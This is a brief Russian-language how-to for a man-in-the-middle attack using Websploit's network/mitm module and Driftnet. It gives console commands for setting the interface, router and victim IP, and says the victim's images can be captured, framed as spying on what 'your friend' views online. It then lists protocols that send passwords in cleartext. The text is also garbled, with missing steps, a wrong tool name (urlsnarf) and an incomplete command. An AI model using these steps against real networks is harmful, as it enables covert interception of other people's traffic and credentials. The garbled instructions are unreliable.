Как мы можем запустить атаку MITM с помощью Websploit и Driftnet – Инструмент, используемый для захвата изображений.
Атака MITM – это тип кибер-атаки, когда атакующий перехватывает связь между двумя сторонами.
Человек по середине – примеры атаки
# apt-get install websploit
Шаг 2: Запуск websploit
# websploit
# wsf > show modules
Шаг 4: Нужно выбрать network/mitm в разделе Network modules.
wsf > use network/mitm wsf:MITM > show options
Interface: необходимо указать интерфейс сетевого адаптера на основе нашего сетевого адаптера.
set Interface eth0
или же
set Interface wlan0
Router: необходимо указать IP-адрес маршрутизатора, можно найти с помощью команды -n.
set Router (Gateway IP)
Цель: IP-адрес машины жертвы, можно найти с помощью ipconfig для windows и ifconfig для Linux.
Шаг 5: Теперь спуститесь на вывод компьютера жертвы и начните заниматься серфингом, все изображения будут захвачены urlsnarf.
Здесь вы можете найти фотографии, которые ваш друг смотрит в Интернете.
Протоколы, уязвимые для сниффинга
HTTP: отправка паролей в текстовом виде
TELNET: передача команд в текстовом виде
SNMP: отправка паролей в текстовом виде
POP: отправка паролей в текстовом виде
FTP: отправка паролей в текстовом виде
NNTP: отправка паролей в текстовом виде
IMAP: отправка паролей в чистом виде
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.
